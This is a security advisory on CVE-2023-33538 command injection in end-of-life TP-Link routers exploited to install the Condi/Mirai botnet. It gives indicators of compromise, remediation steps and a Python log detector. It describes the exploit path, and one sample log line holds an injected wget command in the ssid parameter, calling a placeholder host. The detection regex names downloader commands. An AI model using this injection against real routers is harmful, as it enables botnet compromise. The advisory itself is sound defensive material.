Severity
High
Analysis Summary
A critical security vulnerability, tracked as CVE-2023-33538, is being actively exploited in several end-of-life TP-Link Wi-Fi routers, allowing attackers to deploy Mirai-based botnet malware. The affected models include TL-WR940N (v2/v4), TL-WR740N (v1/v2), and TL-WR841N (v8/v10), all of which no longer receive security updates from the vendor. The flaw exists in the routers’ web management interface due to improper input validation in an HTTP GET request parameter, enabling attackers to inject and execute system commands remotely without triggering device-side warnings.
The exploitation process targets the /userRpm/WlanNetworkRpm endpoint, where malicious payloads are embedded in the ssid parameter. Once executed, the router is instructed to download an ELF binary named arm7 from a remote server (51.38.137[.]113), grant it execution permissions, and run it immediately. Security researchers observed large-scale automated attack activity following the addition of this CVE to CISA’s Known Exploited Vulnerabilities (KEV) catalog in June 2025, confirming active real-world exploitation attempts against exposed devices.
The downloaded arm7 binary is identified as a variant of Condi, a Mirai-based IoT botnet malware. Once installed, it connects to a command-and-control (C2) infrastructure, specifically including the domain cnc.vietdediserver[.]shop, and integrates the infected router into a larger botnet. The malware is designed with multiple capabilities, including heartbeat communication, command execution, self-updating mechanisms, and propagation features that help expand the botnet automatically across other vulnerable devices.
Further analysis shows the malware contains a self-update function (update_bins) that connects back to the attacker’s server to download updated binaries for multiple CPU architectures such as ARM, MIPS, SH4, and x86_64. It also launches an internal HTTP server on a randomly selected high port (1024–65535), enabling infected devices to distribute malware copies to new victims, increasing propagation efficiency. Although observed attacks contained implementation mistakes such as targeting the wrong parameter (ssid instead of ssid1) and relying on unavailable tools like wget, researchers confirmed the vulnerability is valid and fully exploitable when correctly executed.
Since the affected TP-Link devices are end-of-life, no official patches are available. TP-Link recommends replacing vulnerable routers with supported models, changing default credentials to prevent unauthorized access, and monitoring outbound network traffic for connections to known malicious infrastructure. Organizations are also advised to retire these devices where possible, as continued use poses a significant risk of botnet infection and remote compromise.
Impact
- Sensitive Data Theft
- Gain Access
Indicators of Compromise
CVE
- CVE-2023-33538
Domain Name
- cnc.vietdediserver.shop
- bot.ddosvps.cc
IP
- 51.38.137.113
URL
- http://bot.ddosvps.cc/top1hbt.arm
- http://bot.ddosvps.cc/top1hbt.arm5
- http://51.38.137.113/sh4
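The following is an added detection example, not code from the advisory or from any vendor: it matches router web-access log lines against the exploitation pattern described above (requests to /userRpm/WlanNetworkRpm whose ssid or ssid1 value carries shell metacharacters or downloader commands) and matches egress, DNS or firewall log lines against the indicators listed in this section. The log formats, the placeholder download host and all sample lines are constructed assumptions; the indicators, endpoint and parameter names come from the advisory.

```python
"""Match router web-log and egress-log lines against the indicators in this advisory."""
import re
from urllib.parse import parse_qs, urlsplit

# Indicators copied from the advisory's IoC section.
IOC_DOMAINS = {"cnc.vietdediserver.shop", "bot.ddosvps.cc"}
IOC_IPS = {"51.38.137.113"}
IOC_URLS = {
    "http://bot.ddosvps.cc/top1hbt.arm",
    "http://bot.ddosvps.cc/top1hbt.arm5",
    "http://51.38.137.113/sh4",
}

# Endpoint and parameters named in the advisory (ssid1 is the vulnerable parameter;
# the observed campaign hit ssid by mistake, so both are watched).
TARGET_PATH = "/userRpm/WlanNetworkRpm"
WATCHED_PARAMS = ("ssid", "ssid1")
# Shell metacharacters and the download/permission commands that never belong in an SSID.
SHELL_META = re.compile(r"[;|`&]|\$\(|\b(?:wget|chmod)\b")

# Common-log-format request line. Assumption: the router, or a reverse proxy in
# front of it, logs web requests in this format.
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def refang(text: str) -> str:
    """Turn defanged indicators such as 51.38.137[.]113 or hxxp:// back into matchable form."""
    return text.replace("[.]", ".").replace("hxxp://", "http://").replace("hxxps://", "https://")


def flag_http_request(line: str):
    """Return a finding if the request hits the vulnerable endpoint with an injection-shaped value."""
    m = CLF.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != TARGET_PATH:
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                return {"type": "cve-2023-33538-attempt", "src": m.group("src"),
                        "param": name, "value": value, "status": m.group("status")}
    return None


def flag_outbound(line: str):
    """Return the first advisory indicator found in an egress/DNS/firewall log line, else None."""
    text = refang(line)
    # Longest URL first, so .../top1hbt.arm5 is not reported as .../top1hbt.arm.
    for url in sorted(IOC_URLS, key=len, reverse=True):
        if url in text:
            return {"type": "ioc-url", "indicator": url}
    for ip in IOC_IPS:
        # Anchor on non-digit/non-dot so the IP is not matched inside a longer address.
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", text):
            return {"type": "ioc-ip", "indicator": ip}
    for domain in IOC_DOMAINS:
        if re.search(r"(?<![A-Za-z0-9-])" + re.escape(domain) + r"(?![A-Za-z0-9-])", text):
            return {"type": "ioc-domain", "indicator": domain}
    return None


def scan(http_lines, egress_lines):
    """Run both detectors and return the list of findings."""
    findings = [f for f in map(flag_http_request, http_lines) if f]
    findings += [f for f in map(flag_outbound, egress_lines) if f]
    return findings


# Constructed sample log lines (not captured from a real incident). The injection
# value is illustrative and the download host is a placeholder.
SAMPLE_HTTP = [
    '203.0.113.9 - - [20/Jun/2025:10:00:01 +0000] "GET /userRpm/WlanNetworkRpm?ssid=HomeNet&channel=6 HTTP/1.1" 200 512',
    '203.0.113.9 - - [20/Jun/2025:10:00:07 +0000] "GET /userRpm/WlanNetworkRpm?ssid=HomeNet%3Bwget+http%3A%2F%2Fdownload.invalid%2Farm7%3B HTTP/1.1" 200 512',
    '203.0.113.9 - - [20/Jun/2025:10:00:09 +0000] "GET /userRpm/LoginRpm?ssid=x%3Bid HTTP/1.1" 404 0',
]
SAMPLE_EGRESS = [
    "2025-06-20T10:00:12Z dns client=192.168.0.1 query=cnc.vietdediserver[.]shop type=A",
    "2025-06-20T10:00:13Z fw OUT 192.168.0.1:40011 -> 51.38.137.113:80 TCP",
    "2025-06-20T10:00:14Z fw OUT 192.168.0.1:40012 -> 251.38.137.113:443 TCP",  # must not match
    "2025-06-20T10:00:15Z fw OUT 192.168.0.1:40013 -> 93.184.216.34:443 TCP",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_HTTP, SAMPLE_EGRESS):
        print(finding)
```

A request that matches the first detector with a 200 status on one of the affected models is worth treating as a likely compromise rather than a mere probe, since the routers give no device-side warning; the egress detector is the check to run on DNS and firewall logs for any device that cannot be retired immediately.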
Remediation
- The impacted models (TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2) are designated as End-of-Life (EoL). This means they no longer receive official security patches. Replacing these with a modern, supported router is the only way to ensure long-term protection.
- While these routers are EoL, TP-Link has stated that they may provide specific patches upon request. Contact TP-Link Technical Support directly to see if a manual firmware update is available for your specific hardware version to bridge the gap until you can replace it.
- Attackers are using Mirai-style botnets that rely on default login credentials (such as admin:admin). Log in to your router’s management interface and set a strong, unique password.
- Ensure that the "Remote Management" or "Web Management via WAN" feature is OFF. This prevents hackers from reaching your router's login page or exploitation endpoints from the open internet.
- WPS is often used as an entry point for various exploits. Turn it off in the wireless settings to reduce your router's attack surface.